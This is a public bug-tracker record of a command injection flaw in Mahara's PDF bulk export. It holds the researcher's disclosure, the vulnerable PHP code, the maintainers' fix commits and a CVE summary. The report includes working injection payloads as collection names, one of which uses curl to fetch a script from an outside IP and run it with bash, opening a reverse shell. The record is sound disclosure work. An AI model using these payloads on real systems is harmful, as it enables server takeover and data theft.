Mahara

Command injection vulnerability when PDF bulk export is enabled

Bug #1942903 reported by Dominic
258
This bug affects 1 person
Affects Status Importance Assigned to Milestone
Mahara
Fix Released
High
Unassigned
Mahara 21.10.0
20.04
Fix Released
High
Unassigned
Mahara 20.04.5
20.10
Fix Released
High
Unassigned
Mahara 20.10.3
21.04
Fix Released
High
Unassigned
Mahara 21.04.2

Bug Description

Hi team, I hope you're doing well! When the experimental PDF export feature is enabled, a user can craft a malicious collection in Mahara and trigger the command injection issue when an admin exports the attacker's data (either specifically or by exporting the institution the attacker belongs to).

This was tested yesterday (2021-09-06) using the docker-compose file in the master branch of https://git.mahara.org/mahara/mahara/-/tree/master/docker

## Steps To Reproduce:

URLs will be using `http://localhost:6142/mahara/` as that's my local instance's URL. Modify the base URL to fit your environment.

### Setup

1. Login as administrator
2. Go to the Plugin Administration page `http://localhost:6142/mahara/admin/extensions/plugins.php` and enable PDF at the bottom right of the page (installing some prerequisites on the server might be necessary, the plugins page should have instructions)

### Exploitation

1. As the attacker (normal user account), create a collection named `;sleep${IFS}100;`
2. As the administrator go to the bulk export page `http://localhost:6142/mahara/admin/users/bulkexport.php`
3. Choose `PDF files of pages and collections` as the export format
4. Set the attacker's username in `Usernames to export`
5. Click `Export Accounts` and observe the 100 seconds delay in processing

See the following section for a reverse shell example

## Details

The issue comes from https://git.mahara.org/mahara/mahara/-/blob/master/htdocs/export/pdf/lib.php#L298

```php
                $collectionname = $this->collections[$collectionid]->get('name');
                $collectionname = parent::text_to_filename($collectionname);
                if ($combiner == 'pdfunite') {
                    exec('pdfunite ' . implode(' ', $collection) . ' ' . $pdfdirectory . '/' . $collectionid . '_' . $collectionname . '.pdf', $output);
                }
```

`$collectionname` is user controlled and the sanitization allows just enough characters to be able to inject commands

https://git.mahara.org/mahara/mahara/-/blob/master/htdocs/export/html/lib.php#L372-L375

```php
    public static function text_to_filename($text) {
        // truncates the text and replaces NOT allowed characters to hyphens
        return preg_replace('#["()*/:<>?\\| ]+#', '-', mb_substr($text, 0, parent::MAX_FILENAME_LENGTH, 'utf-8'));
    }
```

In the attached video the malicious collection name is

```bash
;cd$IFS`mktemp$IFS-d`;curl${IFS}192.168.1.75$IFS-o${IFS}a.sh;bash${IFS}a.sh;
```

and it triggered a reverse shell, see attached video. Note that I had to install curl on my server to make it work, but that's likely to be present on a real system.

Suggested CVSS: AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H 8.0

`AC:H` because of the setting that's likely to be disabled, `PR:L` because the payload is injected as a regular user, `UI:R` as it's triggered by an admin export, `S:C` as it impact everything on the server once a reverse shell is obtained.

Let me know if you need anything else!

Dominic

See original description

CVE References

Revision history for this message
Dominic (dee-see) wrote :
Revision history for this message
Dominic (dee-see) wrote :

I'm used to writing everything in Markdown, just for clarity in the step 1 of exploitation the backticks aren't part of the payload. The collection name is just ;sleep${IFS}100;

Dominic (dee-see)
description: updated
Robert Lyon (robertl-9)
Changed in mahara:
status: New → Confirmed
importance: Undecided → High
milestone: none → 21.10.0
Revision history for this message
Robert Lyon (robertl-9) wrote :

Have begin a security fix for this
https://reviews.mahara.org/#/c/12027/

It will be publicly available once reviewed

Revision history for this message
Kristina Hoeppner (kris-hoeppner) wrote :

Hi Dominic,

We will apply for a CVE number for this security issue and plan to release a fix for it with our next minor point updates that we expect by the end of October this year.

Thank you
Kristina

Revision history for this message
Mahara Bot (dev-mahara) wrote : A change has been merged

Reviewed: https://reviews.mahara.org/12126
Committed: https://git.mahara.org/mahara/mahara/commit/ff1a3446f5c2a4c0ca35a0f1470d9483d028efdd
Submitter: Robert Lyon (<email address hidden>)
Branch: main

commit ff1a3446f5c2a4c0ca35a0f1470d9483d028efdd
Author: Robert Lyon <email address hidden>
Date: Thu Sep 23 09:48:23 2021 +1200

Security bug 1942903: PDF export can cause command injection vulnerability

When a person names a collection in a certain way the title can be
executed when merging the PDF pages into one collection PDF

Change-Id: Iccca05291d79fe634b40cca11dcc9153a412ab86
Signed-off-by: Robert Lyon <email address hidden>

Revision history for this message
Mahara Bot (dev-mahara) wrote : A patch has been submitted for review

Patch for "21.10_DEV" branch: https://reviews.mahara.org/12202

Revision history for this message
Mahara Bot (dev-mahara) wrote : A change has been merged

Reviewed: https://reviews.mahara.org/12202
Committed: https://git.mahara.org/mahara/mahara/commit/79442bf3879049a5e49f4c1891bbd26570ac27a8
Submitter: Robert Lyon (<email address hidden>)
Branch: 21.10_DEV

commit 79442bf3879049a5e49f4c1891bbd26570ac27a8
Author: Robert Lyon <email address hidden>
Date: Thu Sep 23 09:48:23 2021 +1200

Security bug 1942903: PDF export can cause command injection vulnerability

When a person names a collection in a certain way the title can be
executed when merging the PDF pages into one collection PDF

Change-Id: Iccca05291d79fe634b40cca11dcc9153a412ab86
Signed-off-by: Robert Lyon <email address hidden>
(cherry picked from commit ff1a3446f5c2a4c0ca35a0f1470d9483d028efdd)

Revision history for this message
Mahara Bot (dev-mahara) wrote : A patch has been submitted for review

Patch for "21.04_STABLE" branch: https://reviews.mahara.org/12203

Revision history for this message
Mahara Bot (dev-mahara) wrote :

Patch for "20.10_STABLE" branch: https://reviews.mahara.org/12204

Revision history for this message
Mahara Bot (dev-mahara) wrote :

Patch for "20.04_STABLE" branch: https://reviews.mahara.org/12205

Kristina Hoeppner (kris-hoeppner)
no longer affects: mahara/21.10
Robert Lyon (robertl-9)
information type: Private Security → Public Security
Revision history for this message
Mahara Bot (dev-mahara) wrote : A change has been merged

Reviewed: https://reviews.mahara.org/12205
Committed: https://git.mahara.org/mahara/mahara/commit/b30d4a821812fdb8fd533592dedc8911c6ecf5b5
Submitter: Robert Lyon (<email address hidden>)
Branch: 20.04_STABLE

commit b30d4a821812fdb8fd533592dedc8911c6ecf5b5
Author: Robert Lyon <email address hidden>
Date: Thu Sep 23 09:48:23 2021 +1200

Security bug 1942903: PDF export can cause command injection vulnerability

When a person names a collection in a certain way the title can be
executed when merging the PDF pages into one collection PDF

Change-Id: Iccca05291d79fe634b40cca11dcc9153a412ab86
Signed-off-by: Robert Lyon <email address hidden>
(cherry picked from commit ff1a3446f5c2a4c0ca35a0f1470d9483d028efdd)
(cherry picked from commit 79442bf3879049a5e49f4c1891bbd26570ac27a8)

Revision history for this message
Mahara Bot (dev-mahara) wrote :

Reviewed: https://reviews.mahara.org/12203
Committed: https://git.mahara.org/mahara/mahara/commit/7d94b9e9f87b1235d51f59f8db2d57caf7edd09b
Submitter: Gold (<email address hidden>)
Branch: 21.04_STABLE

commit 7d94b9e9f87b1235d51f59f8db2d57caf7edd09b
Author: Robert Lyon <email address hidden>
Date: Thu Sep 23 09:48:23 2021 +1200

Security bug 1942903: PDF export can cause command injection vulnerability

When a person names a collection in a certain way the title can be
executed when merging the PDF pages into one collection PDF

Change-Id: Iccca05291d79fe634b40cca11dcc9153a412ab86
Signed-off-by: Robert Lyon <email address hidden>
(cherry picked from commit ff1a3446f5c2a4c0ca35a0f1470d9483d028efdd)
(cherry picked from commit 79442bf3879049a5e49f4c1891bbd26570ac27a8)

Revision history for this message
Robert Lyon (robertl-9) wrote :

For the security forum post:

Vulnerability type: Code execution
Attack type: Local
Impact: Ability to gain privileges

Affected components: Exporting of collections with PDF export enabled
Attack vectors: If a person names a collection in a certain way then on exporting it can cause the name to be executed as a command.

Suggested description: In Mahara before 20.04.5, 20.10.3, 21.04.2, and 21.10.0, exporting collections via PDF export could cause code execution.

Reported by: Dominic Couture
Bug report: https://bugs.launchpad.net/mahara/+bug/1942903
CVE reference: TBC

Revision history for this message
Mahara Bot (dev-mahara) wrote :

Reviewed: https://reviews.mahara.org/12204
Committed: https://git.mahara.org/mahara/mahara/commit/6c15801d04887e482b1f490d8acf6f7c52661eea
Submitter: Robert Lyon (<email address hidden>)
Branch: 20.10_STABLE

commit 6c15801d04887e482b1f490d8acf6f7c52661eea
Author: Robert Lyon <email address hidden>
Date: Thu Sep 23 09:48:23 2021 +1200

Security bug 1942903: PDF export can cause command injection vulnerability

When a person names a collection in a certain way the title can be
executed when merging the PDF pages into one collection PDF

Change-Id: Iccca05291d79fe634b40cca11dcc9153a412ab86
Signed-off-by: Robert Lyon <email address hidden>
(cherry picked from commit ff1a3446f5c2a4c0ca35a0f1470d9483d028efdd)
(cherry picked from commit 79442bf3879049a5e49f4c1891bbd26570ac27a8)

To post a comment you must log in.
This report contains Public Security information  
Everyone can see this security related information.
Subscribing...

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.